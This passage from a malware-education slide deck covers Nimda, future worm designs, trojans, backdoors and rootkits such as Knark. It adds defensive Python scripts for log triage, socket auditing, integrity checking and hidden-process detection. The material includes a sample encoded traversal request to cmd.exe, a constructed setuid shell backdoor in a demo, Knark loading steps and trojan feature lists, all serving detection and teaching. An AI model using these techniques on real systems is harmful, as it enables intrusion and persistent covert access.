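    '198.51.100.11 - - [18/Sep/2001:13:41:05 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0',
]

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
IDA_MAX_QUERY = 200  # assumption: legitimate .ida/.idq queries on this server are short; tune per site
HEX = "0123456789abcdefABCDEF"


def percent_decode(s):
    """Turn %XX escapes into raw bytes, leaving everything else as-is."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and s[i + 1] in HEX and s[i + 2] in HEX:
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out += s[i].encode("latin-1", "replace")
            i += 1
    return bytes(out)


def decode_overlong(b):
    """Map overlong two-byte UTF-8 (lead byte C0/C1) back to the ASCII it
    encodes (%c0%af -> '/', %c1%9c -> '\\'): a strict decoder rejects these,
    the vulnerable IIS path handler accepted them."""
    out = bytearray()
    i = 0
    while i < len(b):
        if b[i] in (0xC0, 0xC1) and i + 1 < len(b) and 0x80 <= b[i + 1] <= 0xBF:
            out.append(((b[i] & 0x1F) << 6) | (b[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b[i])
            i += 1
    return out.decode("latin-1")


def canonical_path(path, rounds=2):
    """Decode a request path the way a permissive server would (two rounds
    cover double-encoded input), fold '\\' to '/', resolve '.' and '..', and
    report whether the path climbed above the web root."""
    s = path
    for _ in range(rounds):
        decoded = decode_overlong(percent_decode(s))
        if decoded == s:
            break
        s = decoded
    escaped, parts = False, []
    for seg in s.replace("\\", "/").split("/"):
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts), escaped


def triage_line(line):
    """Return the worm indicators one log line matches (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = m["target"].partition("?")
    canon, escaped = canonical_path(path)
    findings = []
    if path.lower().endswith((".ida", ".idq")) and len(query) > IDA_MAX_QUERY:
        findings.append("oversized query to an .ida/.idq handler (idq.dll overflow attempt, Code Red style)")
    if canon.lower().endswith("/root.exe"):
        findings.append("request for root.exe (Code Red II cmd.exe backdoor)")
    if escaped:
        findings.append("encoded traversal escapes the web root (Nimda-style Unicode traversal)")
    return findings


def triage(lines):
    """Map each flagged client address to its findings."""
    report = {}
    for line in lines:
        found = triage_line(line)
        if found:
            report.setdefault(LOG_RE.match(line)["client"], []).extend(found)
    return report


if __name__ == "__main__":
    for client, findings in triage(SAMPLE_LOG).items():
        print(client, "->", "; ".join(findings))
```

Matching the literal strings %c0%af or root.exe would catch these five lines too; decoding first is what lets the same rule see any encoding of the traversal, which is the property a detection on this class of bug needs.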
W32/Nimda@mm: Payload

• Payload:
  – Large-scale e-mailing: uses MAPI to send itself out as Readme.exe (Readme.exe may NOT be visible as an attachment in the e-mail received)
  – Modifies files: replaces multiple legitimate files with itself
  – Degrades performance: may cause system slowdown
  – Compromises security settings: opens the C drive as a network share

W32/Nimda@mm

• On September 20, 2001, 1200 computers at the Fairfax County Library were hit by the Nimda virus, forcing all of them off the network. 150 technicians from Virginia's Department of Information Technology were called in to help clean the computers: from 30 minutes to 3 hours each!

The Future of Worms

• Client and Server-Side Flaws
  – Buffer overflows
  – Format string attacks
  – Design flaws
  – Open shares
  – Misconfigurations

Current Limitations

• Limited capabilities
• Growth and traffic patterns
• Network structure
• Intelligence Database

Limited Capabilities: Recon

[Diagram: RPC, IIS, SNMP, FTP and LPD probes, one per target]

Limited Capabilities: Attack

[Diagram: exploits 1, 2, 3 against a Target, selected by the logic below]

if {1|2|3}
    attack
else
    abort
end

Network Structure

[Diagram: Early / Late]

Network Topology

[Diagram: Early / Late]

Limitations of Directionality

[Diagram: Target Network]

Intelligence Database

[Diagram: nodes labelled N, with a few labelled I]

Limitations Conclusions

• Highly visible
• Easily blocked
  – need a signature
• Unable to achieve a specific target
• Readily caught

Future Considerations

• Dynamic behavior
• Dynamic updates
• Communications mechanisms
• Infection mechanisms
• Network topologies
• Communications topology
• New targets

Dynamic Behavior

[Diagram: GRE, TCP/80, TCP, NNTP, ICMP 8.0, 53/UDP, SMTP]

Dynamic Behavior

[Diagram: Communications / Platforms / Attacks]

Dynamic invocation of capabilities

Dynamic Network Roles

[Diagram: nodes labelled I, R and A around a Target]

Not every node contains all components

Updates to the Nodes

[Diagram: Release / Retrieve]

Embedding Messages

• Images
• Text
• MP3 files

• Usenet, web, mailing lists
• Freenet, Gnutella, Napster

New Targets

• Embedded devices
  – bugs
  – prevalence on broadband
• Large audience targets
  – Akamai clients
  – Political, financial motivations

The Future of Worms: Encryption/Obfuscation/Polymorphism

• Covert Channel / Stealth Worms
  – Hiding in plain sight
  – ICMP
  – Encoding in normal data stream
  – Nonstandard

The Future of Worms: Encryption/Obfuscation/Polymorphism

• Keyed Payloads
  – Keying a worm before sending, requiring the worm to "call back" to decode itself
  – Clear-text worm never transmits
  – Higher chance of missing key transmissions; less likely to get a worm to disassemble

The Future of Worms: Encryption/Obfuscation/Polymorphism

• Standard Polymorphic/Mutation Techniques
  – Worms meet viruses
  – Continuously changing itself
  – Brute forcing new offsets
  – Adapting to the environment to become "more fit"

The Future of Worms: "Andy Warhol"

• Flash Worms
  – Faster, more accurate spread
  – Complete spread to all possible targets in 5-20 minutes
  – Very low false positive rate
  – Too fast to analyze/disseminate information

The Future of Worms: Intelligent Worms

• Worms meet AI
  – Worm-infected hosts communicating in a p2p method
  – Exchanging information on targeting, propagation, or new infection methods
  – Agent-like behavior

The Future of Worms: Intelligent Worms

• Intelligence Database
• Know­ledge of other nodes
• Concrete vs. abstract
• Complete vs. incomplete

The Future of Worms: Bigger Scope

• Multi-Platform / OS Worms
  – Multi-OS shell code
  – Attacking multiple different vulnerabilities on multiple platforms
  – Single worm code, large attackable base

Trojans

From Quick Thinking Greeks ... to Quick Thinking Geeks

Yeah, but what's a Trojan?

• A small program that is designed to appear desirable but is in fact malicious
• Must be run by the user
• Do not replicate themselves
• Used to take over a computer, or steal/delete data
• Good Trojans will not:
  – alert the user
  – alter the way their computer works

Trojan Horses

• A program which appears to be legitimate, but performs unintended actions.
• Trojan Horses can install backdoors, perform malicious scanning, monitor system logins and other malicious activities.

Trojans

• An easy weapon for script-kiddies to wreak havoc on the Internet.
• They are programs that hide behind a potentially valuable or entertaining program. Trojan horses can be viruses or remote control programs that provide complete access to a victim's computer.
• I was first introduced to one that grabbed passwords on a VAX computer. Someone had written code that mimicked the logon screen and sequence... upon accepting your UserID and password, the owner's account would issue an "improper occurrence" warning and reboot the workstation... then I was able to log on regularly... but my User ID and password were now in a data file owned by the perpetrator.

Trojans

• The majority of modern trojan horses are backdoor utilities
  – Sub Seven
  – Netbus
  – Back Orifice
• The feature set usually includes remote control, desktop viewing, http/ftp server, file sharing, password collecting, port redirection
• Some of these trojan horses can be used as legitimate remote administration tools
• Other trojans are mostly programs that steal/delete data or can drop viruses

Windows Backdoors

• Back Orifice
• Back Orifice 2000 (BO2K)
• NetBus
• WinVNC (Virtual Network Computing)
• SubSeven

Back Doors

• A backdoor allows a malicious attacker to maintain privileged access to a compromised host
• Unix back doors are typically installed via a worm, a root kit, or manually after a system has been initially compromised
• Windows back doors are typically installed via a virus, worm or Trojan horse.
  – Viruses and worms via e-mail, sharing infected files, open Windows shares
  – Trojan horses typically included with a "legitimate" application such as a game, etc.

Back Orifice/BO2k

• A "Remote Administration" tool for Windows 9x and NT.
• Runs on the remote system without the user knowing
• The client can control several servers simultaneously
• Allows the client complete control over the server system, including logging all keystrokes at the console (passwords, e-mail, etc.)
• By default the server listens on TCP 54320 or UDP 54321

Back Orifice/BO2k

• It sets itself to be run automatically by modifying the following Windows registry entry:
  – HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\vmgr.exe
  – The "Data" field of this registry entry is set to "c:\Windows\vmgr.exe".
• Due to this, the Trojan is run at every Windows start-up.
• It's a remote control utility with extensive capabilities that can operate on Windows 9X and Windows NT systems using a client/server model. The server is installed on the desired victim or remote system, and the client is located on the local system.

Back Orifice/BO2k

• Besides opening and closing the CD drawer, it can:
  – turn on the microphone and record conversations
  – turn on the camera to record occurrences in the room
  – create or modify registry keys
  – log keystrokes
  – create dialog boxes and type messages
  – reboot the machine
  – get detailed system information
  – gather passwords (screensaver, dial-up, network access)
  – dump hashed NT passwords from the SAM database (for later cracking in L0phtCrack)
  – copy, rename, delete, view, and search files and directories, even change share attributes

If BO2K can't do it, then the many add-ons (always increasing) will be able to.

Back Orifice/BO2k

[Screenshot]

Back Orifice

[Screenshot]

Netbus

• Provides "Remote Administration" of Windows 9x and NT systems
• Allows full control over windows and devices
  – (open and close windows remotely, screen capture, open and close the CD-ROM tray)
• Logs keystrokes
• Listens on TCP/UDP 12345 and 12346 (configurable in v1.7 and up) for connections
• Listens on TCP/UDP 20034 (v2.x) for connections

Netbus

[Screenshot]

SubSeven

• Windows "remote administration" utility.
• Allows full control over windows and devices.
• Many features not found in other remote admin tools
  – get the Windows CD key
  – retrieve dial-up usernames/passwords, phone numbers
  – AOL/Microsoft/Yahoo IM spy
  – ICQ hijacking

SubSeven

[Screenshot]

SubSeven: Client

• Easy to use interface
• Extremely configurable

www.sub7files.com

SubSeven: Server

• Easy to use interface
• Extremely configurable

Amitis

[Screenshots: Server / Client]

Beast

[Screenshots: Server / Client]

Beast

The Registry Manager, from where you can view and edit the victim's registry... an essential tool for the remote administrator

Beast

• PDF Users Guide
• Full Documentation
• Bug Reporting...

Z-dem0n

[Screenshot]

Trojans - Jokes

One time this guy walks into a bar...

• Newest category of trojans
• Designed to look extremely malicious and are visible to the user
• Don't really do anything at all

...Others

Logic Bombs

• Designed to be extremely malicious
• Hard to detect
• Run after a certain amount of inactivity or in the absence of a certain activity
• Engineered for maximum effect
• Ex. Some malicious logic bombs can take advantage of an error in machine code and set a processor on fire

Logic Bombs

• Tim Lloyd, Omega Engineering Corporation
• On July 31, 1996 a logic bomb executed, causing the loss of its key manufacturing programs and resulting in a loss of more than $10 million.
• 6 lines of code
  – deltree.exe modified to read "fixing" instead of "deleting"
  – Used Purge F:\

Easter EggsEaster Eggs

Windows, PhotoShop 6 Windows, PhotoShop 6

1. Open PhotoShop 6 1. Open PhotoShop 6 2. hold down CTRL-ALT 2. hold down CTRL-ALT 3. go to Help > About PhotoShop... 3. go to Help > About PhotoShop... 4. see the cat (Venus in Furs) 4. see the cat (Venus in Furs)


Easter Eggs

Windows, PhotoShop 6

1. Hold the Ctrl and Alt keys and open the About Photoshop option
2. The usual Electric Cat screen appears.
3. Wait several seconds for the credits to begin scrolling
4. Pressing the Alt key will speed them up...
5. Now, while they're speeding, click the big eye once...
6. While still holding the Alt key, press the Ctrl key
7. Let up on the Alt key.
8. About 60 secret messages will pop up above the scrolling credits


Easter Eggs

Windows, PhotoShop 6
1. Hold down the Option key (Alt on Windows)
2. Choose "Palette Options..." from the Layers palette
3. Merlin window appears


Bizarre Code…

Why did the computer shut down unexpectedly?

The computer got very poorly and decided to end its own suffering.

Makes you wonder what else is hidden?


Unix Backdoors

• Backdoors on Unix are typically a shell bound to a network port.
– A remote attacker can connect to the network port and execute commands, with whatever privileges the process that bound the shell has
• A trojaned daemon such as SSH (included in a root kit) may provide root access without a password.
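A shell bound to a port is visible to the kernel as one more socket in the LISTEN state. The script below is an added example (not part of the original slides) of the check a responder would run: it parses the kernel socket table in the format of Linux's /proc/net/tcp and reports any listener whose port is not on an allowlist. The table embedded in the script is constructed for the demonstration; the allowlist {22, 80} and the 31337 listener are assumptions chosen to illustrate the check.

```python
"""Audit listening TCP sockets by parsing /proc/net/tcp (Linux).

The constructed SAMPLE_PROC_NET_TCP below mimics the kernel's table; on a
live host read /proc/net/tcp and /proc/net/tcp6 instead.  Caveat: a kernel
rootkit that filters /proc/net/tcp (Knark's "nethides" does exactly this)
hides entries from this view too, so confirm with a port scan from another
host.
"""
import socket
import struct

# Socket state column value for LISTEN in /proc/net/tcp.
TCP_LISTEN = 0x0A

# Constructed sample: sshd on 22, a web server on 80 (uid 33), an unexpected
# root-owned listener on 31337, and one established (state 01) connection.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 12346 1 0000000000000000 100 0 0 10 0
   2: 00000000:7A69 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 99999 1 0000000000000000 100 0 0 10 0
   3: 0100007F:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 20 4 30 10 -1
"""


def parse_addr(hexaddr):
    """Convert 'AABBCCDD:PPPP' (little-endian IPv4, hex port) to (ip, port)."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_listeners(table_text):
    """Return [(ip, port, uid, inode)] for every socket in LISTEN state."""
    listeners = []
    for line in table_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 10:
            continue
        if int(fields[3], 16) != TCP_LISTEN:
            continue
        ip, port = parse_addr(fields[1])
        listeners.append((ip, port, int(fields[7]), int(fields[9])))
    return listeners


def unexpected_listeners(table_text, allowed_ports):
    """Listeners whose port is not on the allowlist; each one needs an owner."""
    return [l for l in parse_listeners(table_text) if l[1] not in allowed_ports]


def read_live_table(path="/proc/net/tcp"):
    """Read the real kernel table (Linux only)."""
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    for ip, port, uid, inode in unexpected_listeners(SAMPLE_PROC_NET_TCP, {22, 80}):
        print(f"unexpected listener {ip}:{port} uid={uid} inode={inode}")
```

The inode number is the useful pivot: `find /proc/*/fd -lname "socket:[99999]"` maps the socket back to the process holding it, which is how you find the shell behind the port.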


Root Kits

• A rootkit is a collection of tools that allows the hacker to provide a backdoor to the system, collect information about other hosts on the network, and mask the fact that the system is compromised
• Hides the intruder's activity on the system
• Allows intruder to keep the privileged access
– NOT to initially obtain it
• Root Kits are Trojan Horses and typically provide a Back Door.
• Most root kits can be detected by running an integrity checker such as Tripwire, provided the baseline and the checker itself are trusted
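Because a classic rootkit works by overwriting system binaries (ls, ps, netstat, sshd), a file integrity checker catches it by comparing a trusted baseline of digests against the live files. The following is an added example of that Tripwire-style check, written for this page rather than taken from Tripwire or the slides. The scratch directory, the three fake binaries and the simulated "trojaned ps plus dropped setuid backdoor" are all constructed inside the script so it runs offline.

```python
"""Minimal Tripwire-style file integrity checker.

Build a baseline of SHA-256 digests, mode bits and sizes for a tree, store
it, then diff a later snapshot against it.  In practice you baseline /bin,
/sbin, /usr/bin, /lib and the kernel module directory and keep the baseline
on read-only media.  Caveat: a kernel-level rootkit can lie to open()/read()
on the live system, so run the comparison from a trusted boot medium.
"""
import hashlib
import json
import os
import shutil
import tempfile


def file_digest(path, chunk=1 << 16):
    """SHA-256 over the file contents, streamed so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> (sha256, mode, size) for regular files under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.stat(full)
            snap[os.path.relpath(full, root)] = (
                file_digest(full), st.st_mode & 0o7777, st.st_size)
    return snap


def compare(baseline, current):
    """Sorted lists of added, removed and changed paths between two snapshots."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "changed": sorted(p for p in base_keys & cur_keys
                          if baseline[p] != current[p]),
    }


def save_baseline(snap, path):
    with open(path, "w") as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return {k: tuple(v) for k, v in json.load(f).items()}


def demo():
    """Constructed scenario: baseline three fake binaries, then trojan one
    and drop a setuid backdoor, and report what the checker sees."""
    root = tempfile.mkdtemp(prefix="fim-")
    try:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        for name in ("ls", "ps", "netstat"):
            with open(os.path.join(bindir, name), "wb") as f:
                f.write(b"#!/bin/sh\necho real " + name.encode() + b"\n")
            os.chmod(os.path.join(bindir, name), 0o755)
        base_path = os.path.join(root, "baseline.json")  # kept outside bindir
        save_baseline(snapshot(bindir), base_path)

        # Rootkit-style tampering: replace ps, add a setuid shell wrapper.
        with open(os.path.join(bindir, "ps"), "wb") as f:
            f.write(b"#!/bin/sh\necho trojaned ps\n")
        with open(os.path.join(bindir, "bd"), "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/sh\n")
        os.chmod(os.path.join(bindir, "bd"), 0o4755)

        return compare(load_baseline(base_path), snapshot(bindir))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Mode bits are part of the record on purpose: a binary whose digest is unchanged but which has gained the setuid bit is as interesting as a replaced one.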


Root Kits
• Original Rootkit was distributed from bulletin boards…
– the public remained unaware for a few years. Finally made public in the early '90s.
• Now WIDELY available for many platforms.
• Include an Ethernet sniffer to help find accesses to other servers.
• Once root privilege is obtained on a Unix-based OS, then look to trusted hosts.
• Modify key programs and overwrite them in the OS
• Newer "Kernel-based" rootkits are hard to detect (e.g., "Knark").


T0rn Kit

[ASCII-art "t0rnkit" banner]

$ ./t0rn coded 5000


Knark

• Kernel based root kit for Linux using a Loadable Kernel Module
• Hide files
• Hide running processes
• Hide active network connections
• Change the user and group permissions of running processes


Knark

• Knark is a kernel-based rootkit for Linux 2.2.

No part of knark may be used to break the law, or to cause damage of any kind. And I'm not responsible for anything you do with it.

The heart of the package, knark.c, is a Linux lkm (loadable kernel-module). Type "make" to compile knark and the programs included, and then "insmod knark" to load the lkm. When knark is loaded, the hidden directory /proc/knark is created. The following files are created in this directory:

Creed      shameless self-promotion banner :-)
files      list of hidden files on the system
nethides   list of strings hidden in /proc/net/[tcp|udp]
pids       list of hidden pids, ps-like output
redirects  list of exec-redirection entries
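An LKM rootkit like Knark hides a process by filtering the /proc directory listing that ps reads, but the kernel still routes signals to the hidden PID. Comparing those two views is the standard way to find it. The script below is an added example of that cross-view check (it is not Knark's code or anything from the slides): the core function takes the two views as parameters so it can be exercised on constructed data, and `live_hidden_pids()` wires it to the real kernel on Linux. The PID sets in the script are made up for the demonstration.

```python
"""Cross-view detection of processes hidden from /proc (Linux).

View 1: the numeric entries of /proc, which is what ps and top read.
View 2: kill(pid, 0) for every pid up to pid_max, which asks the kernel
whether the pid exists without sending a signal.  A pid that answers the
probe but is missing from the listing is hidden (or was created between
the two scans, so the live check scans twice and keeps the intersection).
Caveat: a rootkit that also hooks sys_kill defeats this probe; add a third
view (e.g. opening /proc/<pid>/status by number) before trusting a clean
result.
"""
import os


def cross_view_hidden(visible_pids, probe_alive, max_pid):
    """Sorted pids that probe_alive() reports but the listing omits."""
    visible = set(visible_pids)
    return [pid for pid in range(1, max_pid + 1)
            if pid not in visible and probe_alive(pid)]


def proc_visible_pids():
    """Pids as the process listing sees them: numeric /proc entries."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def kill_probe(pid):
    """True if the pid exists according to kill(pid, 0), whoever owns it."""
    try:
        os.kill(pid, 0)
        return True
    except PermissionError:
        return True          # exists, owned by another user
    except ProcessLookupError:
        return False


def live_hidden_pids():
    """Run the check against the real kernel; slow on large pid_max."""
    with open("/proc/sys/kernel/pid_max") as f:
        max_pid = int(f.read())
    first = set(cross_view_hidden(proc_visible_pids(), kill_probe, max_pid))
    second = set(cross_view_hidden(proc_visible_pids(), kill_probe, max_pid))
    return sorted(first & second)   # drop pids that raced one of the scans


# Constructed data: the kernel knows these pids, but the /proc listing has
# been filtered so that 1337 (the rootkit's backdoor) never appears.
KERNEL_PIDS = {1, 2, 42, 1337, 4000}
FILTERED_LISTING = {1, 2, 42, 4000}


def demo():
    return cross_view_hidden(FILTERED_LISTING, lambda p: p in KERNEL_PIDS, 5000)


if __name__ == "__main__":
    print("hidden (constructed data):", demo())
    if os.path.isdir("/proc"):
        print("hidden (live):", live_hidden_pids())
```

The same idea applies to Knark's nethides: compare the connections listed in /proc/net/tcp with what a packet capture or a scan from another host shows, since the rootkit only controls the local view.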


NT Rootkit

• Windows NT or Windows 2000!
• Dynamically loadable kernel device driver.
• Features at a glance:
– Process hiding
– File hiding
– EXE redirection


NT Rootkit
• Process hiding


NT Rootkit
• File hiding


NT Rootkit

• Features continued…
– Hiding registry values
– Keyboard sniffer
– Rootkit console shell


NT Rootkit

• Rootkit console with keyboard sniffing


The Cost of Malware
• Money
– costs associated with hiring temporary staff to repair damage and recover data
• Time
– staff time needed to repair damage, recover data, supervise temps
• Reputation
– unexpected downtime (website and/or library) causes patrons to go elsewhere
• Trust
– patrons trust you with their personal information
– vendors trust you to authenticate your users


Money

• Omega Engineering: $10 million - logic bomb
• 2000 - The ILOVEYOU worm and its copycats caused $6.7 billion in damage in the first five days.


Time

• On September 20, 2001, 1200 computers at the Fairfax County Library were hit by Nimda, forcing all of them off the network. 150 technicians from Virginia's Department of Information Technology were called in to help clean the computers: from 30 minutes to 3 hours each!


Reputation

For Release: January 18, 2002
Eli Lilly Settles FTC Charges Concerning Security Breach

Company Disclosed E-mail Addresses of 669 Subscribers to its Prozac Reminder Service

Eli Lilly and Company (Lilly) has agreed to settle Federal Trade Commission charges regarding the unauthorized disclosure of sensitive personal information collected from consumers through its Prozac.com Web site. As part of the settlement, Lilly will take appropriate security measures to protect consumers' privacy…


Trust


Trends

• More sophisticated intruders
• More sophisticated attack tools
• "Time to Patch" window decreasing: exploits follow vulnerability disclosure faster
• Increasing permeability of firewalls
• Increased ability to mount distributed attacks
• Increased threat from infrastructure attacks
– DOS, worms, attacks on the DNS system and router-based attacks